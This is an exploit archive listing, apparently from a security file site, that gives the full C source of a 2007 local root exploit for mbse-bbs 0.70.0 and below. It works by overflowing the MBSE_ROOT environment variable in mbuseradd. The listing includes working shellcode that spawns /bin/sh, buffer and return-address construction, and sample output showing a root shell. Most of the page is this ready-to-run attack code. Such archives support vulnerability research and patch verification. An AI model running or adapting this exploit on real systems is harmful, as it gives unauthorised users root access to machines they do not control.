prdelka-vs-GNU-mbsebbs.c

prdelka-vs-GNU-mbsebbs.c: Posted Jan 20, 2007; Authored by prdelka | Site prdelka.blackart.org.uk; GNU/Linux mbse-bbs versions 0.70.0 and below local root exploit that makes use of a stack overflow.; tags | exploit, overflow, local, root; systems | linux; SHA-256 | b9b6c8e90f30995598ab9252882b6e7bfe68361174d80d1b09bb34e24378764c; Download | Favorite | View

prdelka-vs-GNU-mbsebbs.c

/* GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit
 * ========================================================
 * Multiple overflow conditions occur within mbse-bbs versions 0.70.0 & below.
 * The current version of mbse-bbs does not contain these weaknesses. 
 * Exploitation of these vulnerabilities can facilitate a privilege escalation
 * attack in which an unprivileged user becomes root. Exploit calculates
 * return address where ASLR is not in use. Vulnerable code is shown below;
 * 
 * matthew@localhost ~/foo/mbsebbs-0.70.0/unix $  cat -n mbuseradd.c 
 * ...
 * 177          shell   = calloc(PATH_MAX, sizeof(char));
 * ...
 * 228          sprintf(shell, "%s/bin/mbsebbs", getenv("MBSE_ROOT"));
 * 
 * (heap corruption in 0.33.17/stack overflow in others).
 * *** glibc detected *** free(): invalid next size (normal): 0x0804e068 ***
 *
 * Example Usage.
 *  matthew@localhost ~ $ id
 *  uid=1000(matthew) gid=100(users) groups=10(wheel),100(users)
 *  matthew@localhost ~ $ ./prdelka-vs-GNU-mbsebbs /opt/mbse/bin/mbuseradd
 *  [ GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit
 *  [ Using return address 0xbfffefd8
 *  sh-3.1# id
 *  uid=0(root) gid=1(bin) groups=10(wheel),100(users)
 * 
 * - prdelka
 */
#include <stdio.h>
#include <stdlib.h>

char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                 "\x31\xc0\x50\x68""//sh""\x68""/bin""\x89\xe3"
                 "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(int argc,char* argv[]) {
        int i;
        long eip = 0x41414141;
  char envh[]="MBSE_ROOT=";
  printf("[ GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit\n");
        if(argc < 2) {
                printf("Error: [path]\n");
                exit(0);
        }
        char* buffer = malloc(strlen(envh) + 4062 + sizeof(eip));
  memset(buffer,0,strlen(envh) + 4062 + sizeof(eip));
  strcpy(buffer,envh);
        long ptr = (long)buffer;  
        for(i = 1;i <= 4061;i++){
                strncat(buffer,"A",1);
        }
        ptr = ptr + 4061;
        memcpy((char*)ptr,(char*)&eip,4);
        eip = 0xc0000000 -4 -strlen(argv[1]) -1 -strlen(buffer) -1 -strlen(shellcode) -1;
        memcpy((char*)ptr,(char*)&eip,4);
        char *env[] = {buffer,NULL};
        printf("[ Using return address 0x%x\n",eip);
        execle(argv[1],argv[1],"x","x","x",shellcode,NULL,env);
        exit(0);
}

Top Authors In Last 30 Days

Red Hat 328 files
Ubuntu 56 files
Gentoo 32 files
Debian 24 files
Apple 9 files
malvuln 6 files
nu11secur1ty 5 files
Google Security Research 4 files
Jann Horn 4 files
Adam Gowdiak 4 files

File Archives

Systems

AIX (429)
Apple (2,088)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,047)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,790)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,914)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,521)
UNIX (9,404)
UnixWare (187)
Windows (6,660)
Other

prdelka-vs-GNU-mbsebbs.c

prdelka-vs-GNU-mbsebbs.c

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

prdelka-vs-GNU-mbsebbs.c

Share This

prdelka-vs-GNU-mbsebbs.c

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems